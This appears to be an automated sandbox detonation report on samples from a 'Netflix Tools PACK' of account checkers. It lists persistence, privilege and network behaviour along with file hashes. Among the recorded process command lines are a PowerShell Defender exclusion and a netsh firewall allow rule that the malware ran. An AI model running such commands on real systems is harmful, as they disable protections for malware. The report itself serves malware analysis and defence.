| SHA512 | 17054340ed1e56d6e0b92f2f41e452ef6a254f7a192b0f8c2039a68b27912796160148241166c7c1978311f6a3747c16d9c47cd3647631a5bb5c70e7582ba466 |
memory/3416-373-0x0000000004BD0000-0x0000000004BE0000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
28s
Max time network
31s
Command Line
Signatures
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\GoldFlix Checker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Launcher.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\460557edf4b4cbfb08eadcebcbd28364.exe | C:\Windows\winconfig.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\460557edf4b4cbfb08eadcebcbd28364.exe | C:\Windows\winconfig.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
| N/A | N/A | C:\Windows\winconfig.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\460557edf4b4cbfb08eadcebcbd28364 = "\"C:\\Windows\\winconfig.exe\" .." | C:\Windows\winconfig.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\460557edf4b4cbfb08eadcebcbd28364 = "\"C:\\Windows\\winconfig.exe\" .." | C:\Windows\winconfig.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\winconfig.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\GoldFlix Checker.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\GoldFlix Checker.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\gfsys.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\gfsys.exe"
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
C:\Windows\winconfig.exe
"C:\Windows\winconfig.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Windows\winconfig.exe" "winconfig.exe" ENABLE
Network
| Country | Destination | Domain | Proto |
| US | 209.197.3.8:80 | tcp | |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.121.24.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.132.60.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hccr.sytes.net | udp |
Files
memory/400-133-0x0000000000AF0000-0x0000000000B26000-memory.dmp
memory/400-134-0x00000000054B0000-0x000000000554C000-memory.dmp
memory/400-135-0x0000000005B50000-0x00000000060F4000-memory.dmp
memory/400-136-0x0000000005640000-0x00000000056D2000-memory.dmp
memory/400-137-0x0000000005550000-0x000000000555A000-memory.dmp
memory/400-138-0x0000000005870000-0x0000000005880000-memory.dmp
memory/400-139-0x00000000056E0000-0x0000000005736000-memory.dmp
memory/1760-140-0x0000000000760000-0x0000000000774000-memory.dmp
memory/1760-141-0x0000000006690000-0x000000000670E000-memory.dmp
memory/1760-142-0x0000000005010000-0x0000000005020000-memory.dmp
memory/548-144-0x0000000000C30000-0x0000000000CA0000-memory.dmp
memory/4576-145-0x0000000002CB0000-0x0000000002CE6000-memory.dmp
memory/4576-146-0x0000000005910000-0x0000000005F38000-memory.dmp
memory/4576-147-0x0000000005720000-0x0000000005742000-memory.dmp
memory/4576-148-0x0000000005F40000-0x0000000005FA6000-memory.dmp
memory/4576-149-0x0000000005FB0000-0x0000000006016000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x22w14w2.gb5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/548-155-0x0000000005830000-0x0000000005840000-memory.dmp
memory/4576-161-0x0000000002CF0000-0x0000000002D00000-memory.dmp
memory/1760-160-0x0000000005010000-0x0000000005020000-memory.dmp
memory/4576-162-0x0000000002CF0000-0x0000000002D00000-memory.dmp
memory/4576-163-0x00000000065E0000-0x00000000065FE000-memory.dmp
memory/548-166-0x0000000005830000-0x0000000005840000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/1760-186-0x0000000006350000-0x00000000063C6000-memory.dmp
memory/4576-187-0x0000000002CF0000-0x0000000002D00000-memory.dmp
memory/1760-188-0x0000000006330000-0x000000000634E000-memory.dmp
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/4860-203-0x0000000000080000-0x0000000000092000-memory.dmp
memory/4576-204-0x00000000077A0000-0x00000000077D2000-memory.dmp
memory/4576-205-0x000000006F4B0000-0x000000006F4FC000-memory.dmp
memory/4576-215-0x0000000006BA0000-0x0000000006BBE000-memory.dmp
memory/4576-216-0x000000007FAD0000-0x000000007FAE0000-memory.dmp
memory/4860-217-0x0000000004A30000-0x0000000004A40000-memory.dmp
memory/4576-218-0x0000000007F40000-0x00000000085BA000-memory.dmp
memory/4576-219-0x00000000078F0000-0x000000000790A000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
memory/4576-223-0x0000000007960000-0x000000000796A000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/1652-224-0x0000000000DE0000-0x0000000000DF2000-memory.dmp
memory/4576-228-0x0000000007B70000-0x0000000007C06000-memory.dmp
memory/1652-229-0x00000000056E0000-0x00000000056F0000-memory.dmp
memory/4576-230-0x0000000007B20000-0x0000000007B2E000-memory.dmp
memory/4576-231-0x0000000007C30000-0x0000000007C4A000-memory.dmp
memory/4576-232-0x0000000007C10000-0x0000000007C18000-memory.dmp
C:\Windows\winconfig.exe
| MD5 | 19f1e1913d37b8698e4fc1bb350d754a |
| SHA1 | 922909897e1e2aa431bbe7974bb99849d1c18ad3 |
| SHA256 | 9d9c257a3f669babda5bbbb3d143a7575f17bee0425f90f80f2ef7bd807bfbc5 |
| SHA512 | d178276ac46efd2614d94e2e1dd91b01aae7b565326b1dd831b47cebdbe292bf9df3cbca7bffbb34a826a138b681f2d4bf5f76dc54f9cca4b74f40f8a0dbbec1 |
C:\Windows\winconfig.exe
| MD5 | 19f1e1913d37b8698e4fc1bb350d754a |
| SHA1 | 922909897e1e2aa431bbe7974bb99849d1c18ad3 |
| SHA256 | 9d9c257a3f669babda5bbbb3d143a7575f17bee0425f90f80f2ef7bd807bfbc5 |
| SHA512 | d178276ac46efd2614d94e2e1dd91b01aae7b565326b1dd831b47cebdbe292bf9df3cbca7bffbb34a826a138b681f2d4bf5f76dc54f9cca4b74f40f8a0dbbec1 |
C:\Windows\winconfig.exe
| MD5 | 19f1e1913d37b8698e4fc1bb350d754a |
| SHA1 | 922909897e1e2aa431bbe7974bb99849d1c18ad3 |
| SHA256 | 9d9c257a3f669babda5bbbb3d143a7575f17bee0425f90f80f2ef7bd807bfbc5 |
| SHA512 | d178276ac46efd2614d94e2e1dd91b01aae7b565326b1dd831b47cebdbe292bf9df3cbca7bffbb34a826a138b681f2d4bf5f76dc54f9cca4b74f40f8a0dbbec1 |
memory/1392-247-0x00000000054D0000-0x00000000054E0000-memory.dmp
memory/1392-248-0x00000000054D0000-0x00000000054E0000-memory.dmp
memory/4860-249-0x0000000004A30000-0x0000000004A40000-memory.dmp
memory/1652-251-0x00000000056E0000-0x00000000056F0000-memory.dmp
memory/1392-252-0x00000000054D0000-0x00000000054E0000-memory.dmp
memory/1392-253-0x00000000054D0000-0x00000000054E0000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
22s
Max time network
30s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\serv.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\serv.exe"
Network
Files
memory/1012-133-0x0000000000C00000-0x0000000000C1E000-memory.dmp
memory/1012-134-0x00000000013A0000-0x00000000013BE000-memory.dmp
memory/1012-135-0x000000001B940000-0x000000001B950000-memory.dmp
memory/1012-136-0x0000000001400000-0x000000000143E000-memory.dmp
memory/1012-137-0x000000001B940000-0x000000001B950000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
42s
Max time network
48s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\litedb.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\litedb.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\litedb.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\litedb.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 42.220.44.20.in-addr.arpa | udp |
| IE | 20.190.159.68:443 | tcp | |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.103.197.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.81.21.72.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.17.30.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
memory/3212-133-0x0000000000400000-0x0000000000671000-memory.dmp
memory/3212-135-0x00000000050D0000-0x00000000050E0000-memory.dmp
memory/3212-136-0x0000000002B10000-0x0000000002BAC000-memory.dmp
memory/3212-137-0x0000000004F40000-0x0000000004FD2000-memory.dmp
memory/3212-138-0x00000000050D0000-0x00000000050E0000-memory.dmp
memory/3212-139-0x00000000050D0000-0x00000000050E0000-memory.dmp
memory/3212-140-0x0000000000400000-0x0000000000671000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:59
Platform
win10v2004-20230621-en
Max time kernel
47s
Max time network
54s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 13.89.178.26:443 | tcp |
Files
memory/4272-133-0x0000000000100000-0x0000000000114000-memory.dmp
memory/4272-134-0x0000000004F10000-0x00000000054B4000-memory.dmp
memory/4272-135-0x0000000004A00000-0x0000000004A92000-memory.dmp
memory/4272-136-0x00000000049C0000-0x00000000049CA000-memory.dmp
memory/4272-137-0x0000000006030000-0x00000000060AE000-memory.dmp
memory/4272-138-0x0000000004950000-0x0000000004960000-memory.dmp
memory/4272-139-0x0000000004950000-0x0000000004960000-memory.dmp
memory/2840-140-0x00000000022D0000-0x0000000002306000-memory.dmp
memory/2840-141-0x0000000004EB0000-0x00000000054D8000-memory.dmp
memory/2840-142-0x0000000004870000-0x0000000004880000-memory.dmp
memory/2840-143-0x0000000004870000-0x0000000004880000-memory.dmp
memory/2840-144-0x0000000004D40000-0x0000000004D62000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lw1m3241.w3c.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2840-150-0x00000000054E0000-0x0000000005546000-memory.dmp
memory/2840-152-0x0000000005590000-0x00000000055F6000-memory.dmp
memory/2840-156-0x0000000005BF0000-0x0000000005C0E000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/4272-178-0x0000000005C90000-0x0000000005D06000-memory.dmp
memory/4272-179-0x0000000005C70000-0x0000000005C8E000-memory.dmp
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/2752-194-0x00000000005A0000-0x00000000005B2000-memory.dmp
memory/2840-195-0x00000000061D0000-0x0000000006202000-memory.dmp
memory/2840-197-0x000000007FD00000-0x000000007FD10000-memory.dmp
memory/2840-199-0x0000000004870000-0x0000000004880000-memory.dmp
memory/2840-198-0x000000006F560000-0x000000006F5AC000-memory.dmp
memory/2840-209-0x00000000061B0000-0x00000000061CE000-memory.dmp
memory/2752-196-0x0000000004F20000-0x0000000004F30000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/2840-214-0x0000000006F10000-0x0000000006F2A000-memory.dmp
memory/2840-213-0x0000000007550000-0x0000000007BCA000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
memory/4344-216-0x0000000000A40000-0x0000000000A52000-memory.dmp
memory/4344-217-0x0000000005310000-0x0000000005320000-memory.dmp
memory/2840-220-0x0000000006F90000-0x0000000006F9A000-memory.dmp
